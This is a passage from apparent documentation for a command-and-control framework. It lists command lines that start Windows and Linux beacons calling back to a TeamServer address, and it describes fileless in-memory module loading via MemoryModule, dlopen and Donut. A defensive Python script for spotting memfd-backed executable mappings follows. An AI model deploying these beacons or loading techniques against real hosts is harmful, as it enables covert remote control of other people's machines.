5 ‐ Beacon
Windows Beacons and command modules are compiled separately in another project, but compiled versions are provided in WindowsBeacons and WindowsModules so they can be used directly.
To launch a beacon available in WindowsBeacons, use the following syntax on a Windows machine:
.\BeaconHttp.exe IP_TEAMSERVER PORT_LISTENER http/https
.\BeaconHttp.exe 10.10.52.5 8443 https
.\BeaconHttp.exe 10.10.52.5 80 http
.\BeaconTcp.exe 10.10.52.5 4444
When the Beacon starts and connects to the TeamServer, a new session is created from which you can interact with the Beacon.
The Windows beacon primarily uses the Windows API and starts with no modules loaded. Modules are loaded at runtime using the "MemoryModule" project, which loads DLLs sent by the TeamServer to the beacon.
AssemblyExec and Inject, which use the Donut project, make it possible to launch EXEs and DLLs, managed or unmanaged, directly from memory on the remote host.
Linux Beacons and command modules are compiled separately in another project, but compiled versions are provided in LinuxBeacons and LinuxModules so they can be used directly. They try to work in a similar fashion to the Windows version.
The Linux beacon starts with no modules loaded. Modules are loaded at runtime using "dlopen" to load SOs sent by the TeamServer to the beacon; the libraries are not written to disk but are loaded directly from memory.
To launch a beacon available in LinuxBeacons use the following syntax on a Linux machine:
./BeaconHttp IP_TEAMSERVER PORT_LISTENER http/https
./BeaconHttp 10.10.52.5 8443 https
./BeaconHttp 10.10.52.5 80 http
./BeaconTcp 10.10.52.5 4444
The binaries are not statically linked with std, so they could fail to start.
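For defenders, the in-memory module loading described above for the Linux beacon can be hunted from /proc. The following is an added example, not code from this project. It assumes the library ends up mapped from a memfd or an unlinked file (the page does not say which mechanism is used), and the sample maps lines are constructed.

```python
"""Flag executable mappings in /proc/<pid>/maps that have no on-disk file."""
import re
from pathlib import Path

# Field layout of a maps line: address perms offset dev inode [pathname]
MAPS_LINE = re.compile(
    r"^(?P<start>[0-9a-f]+)-(?P<end>[0-9a-f]+)\s+(?P<perms>[rwxsp-]{4})\s+"
    r"[0-9a-f]+\s+[0-9a-f]+:[0-9a-f]+\s+(?P<inode>\d+)\s*(?P<path>.*)$"
)

# Constructed sample, not captured from a real host.
SAMPLE_MAPS = """
55d0c1a00000-55d0c1a21000 r-xp 00001000 08:01 131090 /usr/bin/example
7f3a10000000-7f3a10004000 r--p 00000000 00:01 2049 /memfd:mod (deleted)
7f3a10004000-7f3a10019000 r-xp 00004000 00:01 2049 /memfd:mod (deleted)
7f3a20000000-7f3a20180000 r-xp 00028000 08:01 262200 /usr/lib/libc.so.6
7f3a30000000-7f3a30002000 r-xp 00000000 08:01 262999 /tmp/old.so (deleted)
7ffd5a1fe000-7ffd5a200000 r-xp 00000000 00:00 0 [vdso]
"""

def classify(path):
    """Return a reason if the backing object is not a regular on-disk file."""
    if path.startswith("/memfd:"):
        return "memfd-backed"
    if path.endswith(" (deleted)"):
        return "deleted-file"
    return None

def suspicious_mappings(maps_text):
    """Return (start, end, perms, path, reason) for executable fileless maps."""
    findings = []
    for line in maps_text.splitlines():
        m = MAPS_LINE.match(line.strip())
        if not m or "x" not in m["perms"]:
            continue  # unparsable line or non-executable mapping
        reason = classify(m["path"])
        if reason:
            findings.append((m["start"], m["end"], m["perms"], m["path"], reason))
    return findings

def scan_host():
    """Scan every PID under /proc; unreadable or exited processes are skipped."""
    report = {}
    for maps in Path("/proc").glob("[0-9]*/maps"):
        try:
            hits = suspicious_mappings(maps.read_text())
        except OSError:
            continue
        if hits:
            report[int(maps.parent.name)] = hits
    return report
```

Hits are triage leads rather than verdicts: some legitimate software maps executable memory from memfd, and deleted-file mappings also appear after package upgrades.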